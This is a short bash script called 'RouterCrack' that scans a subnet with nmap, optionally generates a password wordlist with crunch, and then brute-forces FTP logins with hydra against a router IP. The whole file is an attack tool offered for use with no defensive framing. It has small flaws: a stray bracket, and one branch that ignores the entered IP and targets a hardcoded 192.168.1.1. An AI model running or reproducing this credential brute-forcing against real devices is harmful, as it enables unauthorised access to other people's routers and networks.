#! /bin/bash
note="yes"

echo -e "\e[32mRouterCrack" Script in bash 

echo 
echo "" 
echo ""

echo -e "\e[35mBy:<< ELAS LAYVTH >>" 

printf "...............................................................
        .........    ...........  ...............
        ..      ..   ...
        ..     ..    ...
        ........     ...
         Router       Crack          BY ELAS
        ........     ...
        ..     ..    ...
        ..      ..   ...........  ...............
        ..       ..  ...........  ..............."


echo "" 
echo ""
 
echo lets start:

echo "" 
echo ""

echo -e "\e[32myour ip __ EX: 192.168.1.1" 

read ip

echo "" 
echo ""

printf "wait until the scan finish to see if the ftp port is open"
echo ""

printf " scan ... "

nmap -sV $ip/24

echo "" 
echo ""

printf "\e[0;34mdo you want to use crunch to generate wordlist yes or no"]

echo ""
echo ""

read -r note 

if [ "$note" = "yes" ] ; then 

echo "" 
echo ""

echo min

read min

echo "" 
echo ""

echo max

read max

echo "something_like: 0123abc"

read smthing

echo "" 
echo ""

echo -e "\e[32moutput:__EX:/root/Desktop/ELAS.txt"

read output


crunch $min $max $smthing -o $output

echo "" 
echo ""

echo -e "\e[32myour username list:__EX:/root/Desktop/hell.txt"

read username

echo "" 
echo ""

echo -e "\e[32myour password wordlist:"

read wordlist

hydra -L $username -P $wordlist ftp://192.168.1.1

elif [ "$note" = "no" ] ; then 

echo "" 
echo ""

echo -e "\e[32myour username list:__EX:/root/Desktop/hell.txt"

read username

echo "" 
echo ""

echo -e "\e[32myour password wordlist:"

read wordlist

hydra -L $username -P $wordlist ftp://$ip

printf "GoodBye"

fi

